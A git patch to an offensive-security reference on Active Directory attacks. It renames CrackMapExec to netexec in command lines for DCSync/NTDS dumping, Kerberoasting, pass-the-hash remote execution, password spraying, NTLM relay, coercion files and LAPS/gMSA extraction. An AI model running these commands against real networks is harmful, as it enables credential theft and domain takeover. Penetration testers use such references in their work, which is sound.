From 2c39a69994af7aca31890412cde1f26ec98807ee Mon Sep 17 00:00:00 2001 From: mpgn Date: Fri, 29 Mar 2024 21:24:52 +0000 Subject: [PATCH] switch to nxc as cme is archived --- docs/active-directory/CVE/MS14-068.md | 2 +- docs/active-directory/CVE/NoPAC.md | 4 +-- docs/active-directory/CVE/PrintNightmare.md | 2 +- docs/active-directory/CVE/ZeroLogon.md | 4 +-- .../ad-adcs-certificate-services.md | 2 +- docs/active-directory/ad-adds-enumerate.md | 6 ++-- docs/active-directory/ad-adds-groups.md | 2 +- docs/active-directory/ad-adds-linux.md | 4 +-- docs/active-directory/ad-adds-ntds-dumping.md | 8 +++--- docs/active-directory/ad-roasting-asrep.md | 6 ++-- .../ad-roasting-kerberoasting.md | 4 +-- docs/active-directory/hash-pass-the-hash.md | 4 +-- docs/active-directory/internal-mitm-relay.md | 8 +++--- docs/active-directory/internal-shares.md | 8 +++--- .../kerberos-delegation-unconstrained.md | 4 +-- docs/active-directory/kerberos-tickets.md | 2 +- docs/active-directory/pwd-comments.md | 4 +-- .../pwd-group-policy-preferences.md | 6 ++-- docs/active-directory/pwd-read-gmsa.md | 6 ++-- docs/active-directory/pwd-read-laps.md | 4 +-- docs/active-directory/pwd-spraying.md | 6 ++-- docs/active-directory/trust-relationship.md | 4 +-- docs/cheatsheets/miscellaneous-tricks.md | 2 +- .../access/windows-using-credentials.md | 28 +++++++++---------- .../windows-privilege-escalation.md | 2 +- 25 files changed, 66 insertions(+), 66 deletions(-) diff --git a/docs/active-directory/CVE/MS14-068.md b/docs/active-directory/CVE/MS14-068.md index d2f90ac..aee7f7d 100644 --- a/docs/active-directory/CVE/MS14-068.md +++ b/docs/active-directory/CVE/MS14-068.md @@ -22,7 +22,7 @@ This exploit require to know the user SID, you can use `rpcclient` to remotely g Convert-NameToSid high-sec-corp.localkrbtgt S-1-5-21-2941561648-383941485-1389968811-502 ``` -* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid` +* netexec: `netexec ldap DC1.lab.local -u username -p password -k --get-sid` ```bash Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 diff --git a/docs/active-directory/CVE/NoPAC.md b/docs/active-directory/CVE/NoPAC.md index 83bc4db..847f860 100644 --- a/docs/active-directory/CVE/NoPAC.md +++ b/docs/active-directory/CVE/NoPAC.md @@ -10,12 +10,12 @@ 0. Check the MachineAccountQuota of the account ```powershell - crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ + netexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ StandIn.exe --object ms-DS-MachineAccountQuota=* ``` 1. Check if the DC is vulnerable ```powershell - crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac + netexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac ``` **Exploitation** diff --git a/docs/active-directory/CVE/PrintNightmare.md b/docs/active-directory/CVE/PrintNightmare.md index 71c4251..6dc7422 100644 --- a/docs/active-directory/CVE/PrintNightmare.md +++ b/docs/active-directory/CVE/PrintNightmare.md @@ -48,7 +48,7 @@ When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: ```ps1 -cme smb -u user -p password -d domain.local -M webdav [TARGET] +nxc smb -u user -p password -d domain.local -M webdav [TARGET] ``` **Trigger the exploit**: diff --git a/docs/active-directory/CVE/ZeroLogon.md b/docs/active-directory/CVE/ZeroLogon.md index 0975bcf..cf2516b 100644 --- a/docs/active-directory/CVE/ZeroLogon.md +++ b/docs/active-directory/CVE/ZeroLogon.md @@ -75,9 +75,9 @@ Exploit steps from the white paper lsadump::postzerologon /target:10.10.10.10 /account:DC01$ ``` -* `CrackMapExec` - only check +* `netexec` - only check ```powershell - crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon + netexec smb 10.10.10.10 -u username -p password -d domain -M zerologon ``` A 2nd approach to exploit zerologon is done by relaying authentication. diff --git a/docs/active-directory/ad-adcs-certificate-services.md b/docs/active-directory/ad-adcs-certificate-services.md index 7e54c45..b56f5a4 100644 --- a/docs/active-directory/ad-adcs-certificate-services.md +++ b/docs/active-directory/ad-adcs-certificate-services.md @@ -5,7 +5,7 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role ## ADCS Enumeration -* crackmapexec: `crackmapexec ldap domain.lab -u username -p password -M adcs` +* netexec: `netexec ldap domain.lab -u username -p password -M adcs` * ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` * certutil: `certutil.exe -config - -ping`, `certutil -dump` diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index f50f9bd..bfe8727 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -282,9 +282,9 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun Sometimes you need to find a machine where a specific user is logged in. You can remotely query every machines on the network to get a list of the users's sessions. -* CrackMapExec +* netexec ```ps1 - cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions + nxc smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator ``` @@ -320,7 +320,7 @@ You can remotely query every machines on the network to get a list of the users' ## References * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) -* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/) +* [Pen Testing Active Directory Environments - Part I: Introduction to netexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-netexec-powerview/) * [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/) * [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/) * [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/) diff --git a/docs/active-directory/ad-adds-groups.md b/docs/active-directory/ad-adds-groups.md index 5d66d8d..281a91e 100644 --- a/docs/active-directory/ad-adds-groups.md +++ b/docs/active-directory/ad-adds-groups.md @@ -9,7 +9,7 @@ If you do not want modified ACLs to be overwritten every hour, you should change Find users with `AdminCount=1`. ```ps1 -crackmapexec ldap 10.10.10.10 -u username -p password --admin-count +netexec ldap 10.10.10.10 -u username -p password --admin-count # or bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get search --filter '(admincount=1)' --attr sAMAccountName # or diff --git a/docs/active-directory/ad-adds-linux.md b/docs/active-directory/ad-adds-linux.md index 9e288af..9dae044 100644 --- a/docs/active-directory/ad-adds-linux.md +++ b/docs/active-directory/ad-adds-linux.md @@ -99,8 +99,8 @@ On macOS you can use `bifrost`. Connect to the machine using the account and the hash with CME. ```powershell -$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN" -CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 +$ netexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN" + 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 ``` diff --git a/docs/active-directory/ad-adds-ntds-dumping.md b/docs/active-directory/ad-adds-ntds-dumping.md index eb96300..223daf7 100644 --- a/docs/active-directory/ad-adds-ntds-dumping.md +++ b/docs/active-directory/ad-adds-ntds-dumping.md @@ -27,8 +27,8 @@ DCSync is a technique used by attackers to obtain sensitive information, includi ```powershell mimikatz# lsadump::dcsync /domain:htb.local /all /csv - crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds - crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi + netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds + netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi ``` > :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts. @@ -48,9 +48,9 @@ The VSS is a Windows service that allows users to create snapshots or backups of ```powershell ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q ``` -* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) +* [netexec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) ```powershell - cme smb 10.10.0.202 -u username -p password --ntds vss + nxc smb 10.10.0.202 -u username -p password --ntds vss ``` diff --git a/docs/active-directory/ad-roasting-asrep.md b/docs/active-directory/ad-roasting-asrep.md index 7d94d58..94b29fd 100644 --- a/docs/active-directory/ad-roasting-asrep.md +++ b/docs/active-directory/ad-roasting-asrep.md @@ -44,9 +44,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast ``` -* CrackMapExec Module +* netexec Module ```powershell - $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt + $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt LDAP 10.0.2.11 389 dc01 $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5 ``` @@ -106,7 +106,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4- ```bash user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache - user@hostname:~$ crackmapexec smb DC01.DOMAIN.LOCAL -k --shares + user@hostname:~$ netexec smb DC01.DOMAIN.LOCAL -k --shares ``` **Mitigations**: diff --git a/docs/active-directory/ad-roasting-kerberoasting.md b/docs/active-directory/ad-roasting-kerberoasting.md index 6644e85..3e63df9 100644 --- a/docs/active-directory/ad-roasting-kerberoasting.md +++ b/docs/active-directory/ad-roasting-kerberoasting.md @@ -18,9 +18,9 @@ Any valid domain user can request a kerberos ticket (ST) for any domain service. $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2 ``` -* CrackMapExec Module +* netexec Module ```powershell - $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt + $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt LDAP 10.0.2.11 389 dc01 [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False) LDAP 10.0.2.11 389 dc01 $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9 ``` diff --git a/docs/active-directory/hash-pass-the-hash.md b/docs/active-directory/hash-pass-the-hash.md index 5a568de..fb9877a 100644 --- a/docs/active-directory/hash-pass-the-hash.md +++ b/docs/active-directory/hash-pass-the-hash.md @@ -14,9 +14,9 @@ The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since run shell ``` -* CrackMapExec +* netexec ```powershell - cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" + nxc smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" ``` * Impacket suite ```powershell diff --git a/docs/active-directory/internal-mitm-relay.md b/docs/active-directory/internal-mitm-relay.md index b048240..c324df0 100644 --- a/docs/active-directory/internal-mitm-relay.md +++ b/docs/active-directory/internal-mitm-relay.md @@ -83,10 +83,10 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support - # the socks proxy can then be used with your Impacket tools or CrackMapExec + # the socks proxy can then be used with your Impacket tools or netexec $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth - $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" + $ proxychains netexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" ``` **Mitigations**: @@ -106,7 +106,7 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. ```powershell -crackmapexec smb $hosts --gen-relay-list relay.txt +netexec smb $hosts --gen-relay-list relay.txt # DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 # -d is the domain name that we filter our request on - the attacked domain @@ -239,7 +239,7 @@ secretsdump.py -k -no-pass target.lab.local * Discover WebDAV services ```ps1 webclientservicescanner 'domain.local'/'user':'password'@'machine' - crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav + netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav GetWebDAVStatus.exe 'machine' ``` * Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. diff --git a/docs/active-directory/internal-shares.md b/docs/active-directory/internal-shares.md index 6d072a0..de48f89 100644 --- a/docs/active-directory/internal-shares.md +++ b/docs/active-directory/internal-shares.md @@ -98,12 +98,12 @@ IconFile=\\10.10.10.10\Share\test.ico Command=ToggleDesktop ``` -Using [`crackmapexec`](https://github.com/mpgn/CrackMapExec/blob/master/cme/modules/slinky.py): +Using [`netexec`](https://github.com/Pennyw0rth/NetExec/blob/master/cme/modules/slinky.py): ```ps1 -crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf -crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk -crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP +netexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf +netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk +netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP ``` ### URL Files diff --git a/docs/active-directory/kerberos-delegation-unconstrained.md b/docs/active-directory/kerberos-delegation-unconstrained.md index 691f00e..d1a78de 100644 --- a/docs/active-directory/kerberos-delegation-unconstrained.md +++ b/docs/active-directory/kerberos-delegation-unconstrained.md @@ -41,9 +41,9 @@ Check the `TRUSTED_FOR_DELEGATION` property. grep TRUSTED_FOR_DELEGATION domain_computers.grep ``` -* [CrackMapExec module](https://github.com/mpgn/CrackMapExec/wiki) +* [netexec module](https://github.com/Pennyw0rth/NetExec/wiki) ```powershell - cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation + nxc ldap 10.10.10.10 -u username -p password --trusted-for-delegation ``` * BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` diff --git a/docs/active-directory/kerberos-tickets.md b/docs/active-directory/kerberos-tickets.md index d52279a..cfa8b73 100644 --- a/docs/active-directory/kerberos-tickets.md +++ b/docs/active-directory/kerberos-tickets.md @@ -25,7 +25,7 @@ There are two types of tickets in Kerberos: ## Replay Kerberos Tickets * Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\TGT_Administrator@lab.local.ccache"` -* CrackMapExec: `KRB5CCNAME=/tmp/administrator.ccache crackmapexec smb 10.10.10 -u user --use-kcache` +* netexec: `KRB5CCNAME=/tmp/administrator.ccache netexec smb 10.10.10 -u user --use-kcache` ## Convert Kerberos Tickets diff --git a/docs/active-directory/pwd-comments.md b/docs/active-directory/pwd-comments.md index da0ee19..da5273b 100644 --- a/docs/active-directory/pwd-comments.md +++ b/docs/active-directory/pwd-comments.md @@ -9,8 +9,8 @@ There are 3-4 fields that seem to be common in most Active Directory schemas: `U * Password in User Description ```powershell - crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc - crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users + netexec ldap domain.lab -u 'username' -p 'password' -M user-desc + netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users GET-DESC... 10.0.2.11 389 dc01 [+] Found following users: GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account diff --git a/docs/active-directory/pwd-group-policy-preferences.md b/docs/active-directory/pwd-group-policy-preferences.md index 4b7f061..e59e92c 100644 --- a/docs/active-directory/pwd-group-policy-preferences.md +++ b/docs/active-directory/pwd-group-policy-preferences.md @@ -27,10 +27,10 @@ echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aS post/windows/gather/credentials/gpp ``` -* CrackMapExec modules +* netexec modules ```powershell - cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin - cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password + nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin + nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password ``` * [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py) diff --git a/docs/active-directory/pwd-read-gmsa.md b/docs/active-directory/pwd-read-gmsa.md index 1cb386b..ec749e6 100644 --- a/docs/active-directory/pwd-read-gmsa.md +++ b/docs/active-directory/pwd-read-gmsa.md @@ -15,11 +15,11 @@ ### Extract NT hash from the Active Directory -* [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec) +* [mpgn/netexec](https://github.com/Pennyw0rth/NetExec) ```ps1 # Use --lsa to get GMSA ID - crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99 - crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....' + netexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99 + netexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....' ``` * [CravateRouge/bloodyAD](https://github.com/CravateRouge/bloodyAD) diff --git a/docs/active-directory/pwd-read-laps.md b/docs/active-directory/pwd-read-laps.md index b100569..21e5651 100644 --- a/docs/active-directory/pwd-read-laps.md +++ b/docs/active-directory/pwd-read-laps.md @@ -61,9 +61,9 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 ``` - * [CrackMapExec](https://github.com/mpgn/CrackMapExec): + * [netexec](https://github.com/Pennyw0rth/NetExec): ```bash - crackmapexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps + netexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps ``` * [LAPSDumper](https://github.com/n00py/LAPSDumper) diff --git a/docs/active-directory/pwd-spraying.md b/docs/active-directory/pwd-spraying.md index ebf8445..3c9b487 100644 --- a/docs/active-directory/pwd-spraying.md +++ b/docs/active-directory/pwd-spraying.md @@ -38,9 +38,9 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. ## Spray a pre-generated passwords list -* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. +* Using `netexec` and `mp64` to generate passwords and spray them against SMB services on the network. ```powershell - crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` + netexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` ``` * Using `DomainPasswordSpray` to spray a password against all users of a domain. ```powershell @@ -74,7 +74,7 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. > The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. ```powershell -$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users +$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: ``` \ No newline at end of file diff --git a/docs/active-directory/trust-relationship.md b/docs/active-directory/trust-relationship.md index 92fe6eb..1e8b90e 100644 --- a/docs/active-directory/trust-relationship.md +++ b/docs/active-directory/trust-relationship.md @@ -24,9 +24,9 @@ ---------- ---------- --------- -------------- domainA.local domainB.local TreeRoot Bidirectional ``` -* Crackmapexec module `enum_trusts` +* netexec module `enum_trusts` ```powershell - cme ldap -u -p -M enum_trusts + nxc ldap -u -p -M enum_trusts ``` diff --git a/docs/cheatsheets/miscellaneous-tricks.md b/docs/cheatsheets/miscellaneous-tricks.md index a781a6c..9912583 100644 --- a/docs/cheatsheets/miscellaneous-tricks.md +++ b/docs/cheatsheets/miscellaneous-tricks.md @@ -16,7 +16,7 @@ $ who $ write root pts/2 # press Ctrl+D after typing the message. ``` -## CrackMapExec Credential Database +## netexec Credential Database ```ps1 cmedb (default) > workspace create test diff --git a/docs/redteam/access/windows-using-credentials.md b/docs/redteam/access/windows-using-credentials.md index 423e3e0..2e40385 100644 --- a/docs/redteam/access/windows-using-credentials.md +++ b/docs/redteam/access/windows-using-credentials.md @@ -7,7 +7,7 @@ * [Guest Credential](#guest-credential) * [Retail Credential](#retail-credential) * [Sandbox Credential](#sandbox-credential) -* [Crackmapexec](#crackmapexec) +* [netexec](#netexec) * [Impacket](#impacket) * [PSExec](#psexec) * [WMIExec](#wmiexec) @@ -94,23 +94,23 @@ Username: wdagutilityaccount Password: pw123 ``` -## Crackmapexec +## netexec -Using [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec) +Using [mpgn/netexec](https://github.com/Pennyw0rth/NetExec) -* CrackMapExec supports many protocols +* netexec supports many protocols ```powershell - crackmapexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" ``` -* CrackMapExec works with password, NT hash and Kerberos authentication +* netexec works with password, NT hash and Kerberos authentication ```powershell - crackmapexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password - crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash - export KRB5CCNAME=/tmp/kerberos/admin.ccache; crackmapexec smb 192.168.1.100 -u admin --use-kcache # Kerberos + netexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password + netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash + export KRB5CCNAME=/tmp/kerberos/admin.ccache; netexec smb 192.168.1.100 -u admin --use-kcache # Kerberos ``` @@ -228,7 +228,7 @@ PS C:\> netsh firewall set service remoteadmin enable PS C:\> netsh firewall set service remotedesktop enable # Alternative C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 -root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable +root@payload$ netexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable # Fix CredSSP errors reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f diff --git a/docs/redteam/escalation/windows-privilege-escalation.md b/docs/redteam/escalation/windows-privilege-escalation.md index 6075238..b8952f7 100644 --- a/docs/redteam/escalation/windows-privilege-escalation.md +++ b/docs/redteam/escalation/windows-privilege-escalation.md @@ -1446,7 +1446,7 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc ### MS17-010 (Eternal Blue) -Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. +Check the vulnerability with the following nmap script or netexec: `netexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. ```c nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010